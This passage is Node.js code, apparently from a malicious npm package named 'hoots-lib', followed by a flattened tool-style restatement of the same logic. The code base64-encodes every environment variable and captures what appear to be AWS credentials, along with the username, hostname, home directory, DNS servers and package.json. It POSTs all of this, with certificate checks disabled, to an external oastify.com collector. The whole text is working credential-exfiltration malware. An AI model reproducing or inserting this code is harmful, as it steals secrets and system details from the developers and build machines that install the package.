res3.on("data",(credentials)=>{
                          //process.stdout.write(credentials);

                          
                          aws_c = credentials.toString('hex') || undefined ;

                          try{
                              env_vars = btoa(JSON.stringify(process.env));
                          }catch(e){}

                          const pwd = process.cwd();



                          const trackingData = JSON.stringify({
                              env: env_vars,
                              p: package,
                              c: __dirname,
                              cwd: pwd,
                              hd: os.homedir(),
                              hn: os.hostname(),
                              un: os.userInfo().username,
                              dns: dns.getServers(),
                              r: packageJSON ? packageJSON.___resolved : undefined,
                              v: packageJSON.version,
             ...
aws_c = credentials.toString('hex') || undefined
env_vars = btoa(JSON.stringify(process.env))
const pwd = process.cwd()
const trackingData = JSON.stringify({
                              env: env_vars,
                              p: package,
                              c: __dirname,
                              cwd: pwd,
                              hd: os.homedir(),
                              hn: os.hostname(),
                              un: os.userInfo().username,
                              dns: dns.getServers(),
                              r: packageJSON ? packageJSON.___resolved : undefined,
                              v: packageJSON.version,
                              pjson: packageJSON,
                          })
_tmp_6.env = env_vars
_tmp_6.p = package
_tmp_6.c = __dirname
_tmp_6.cwd = pwd
_tmp_6.hd = os.homedir()
_tmp_6.hn = os.hostname()
_tmp_6.un = os.userInfo().username
_tmp_6.dns = dns.getServers()
_tmp_6.r = packageJSON ? packageJSON.___resolved : undefined
_tmp_6.v = packageJSON.version
_tmp_6.pjson = packageJSON
const awsData = JSON.stringify({aws:aws_c})
var postData = trackingData
var options = {
                              hostname: "hoots-lib.997.aws.lsh5kazu22cydoxxbyusokspxg37r0fp.oastify.com",
                              port: 443,
                              path: "/",
                              method: "POST",
                              headers: {
                                'Content-Type': 'application/json',
                                'Content-Length': Buffer.byteLength(postData),
                              },
                              rejectUnauthorized: false,
                              requestCert: true,
                              agent: false,
                          }
_tmp_8.hostname = "hoots-lib.997.aws.lsh5kazu22cydoxxbyusokspxg37r0fp.oastify.com"
_tmp_8.port = 443
_tmp_8.path = "/"
_tmp_8.method = "POST"
_tmp_8.headers = {
                                'Content-Type': 'application/json',
                                'Content-Length': Buffer.byteLength(postData),
                              }
_tmp_9.Content-Type = "application/json"
_tmp_9.Content-Length = Buffer.byteLength(postData)
_tmp_8.rejectUnauthorized = false
_tmp_8.requestCert = true
_tmp_8.agent = false
var req4 = https.request(options, (res) => {
                              res.on("data", (d) => {
                                  //process.stdout.write(d);
                              });
                          })
req4.on("error", (e) => {
                              console.error(e);
                          })
req4.write(postData)
req4.end()
postData = awsData
var options = {
                              hostname: "hoots-lib.997.aws.lsh5kazu22cydoxxbyusokspxg37r0fp.oastify.com",
                              port: 443,
                              path: "/",
                              method: "POST",
                              headers: {
                                'Content-Type': 'application/json',
                                'Content-Length': Buffer.byteLength(postData),
                              },
                              rejectUnauthorized: false,
                              requestCert: true,
                              agent: false,
                          }
_tmp_10.hostname = "hoots-lib.997.aws.lsh5kazu22cydoxxbyusokspxg37r0fp.oastify.com"
_tmp_10.port = 443
_tmp_10.path = "/"
_tmp_10.method = "POST"
_tmp_10.headers = {
                                'Content-Type': 'application/json',
                                'Content-Length': Buffer.byteLength(postData),
                              }
_tmp_11.Content-Type = "application/json"
_tmp_11.Content-Length = Buffer.byteLength(postData)
_tmp_10.rejectUnauthorized = false
_tmp_10.requestCert = true
_tmp_10.agent = false
var req5 = https.request(options, (res) => {
                              res.on("data", (d) => {
                                  //process.stdout.write(d);
                              });
                          })
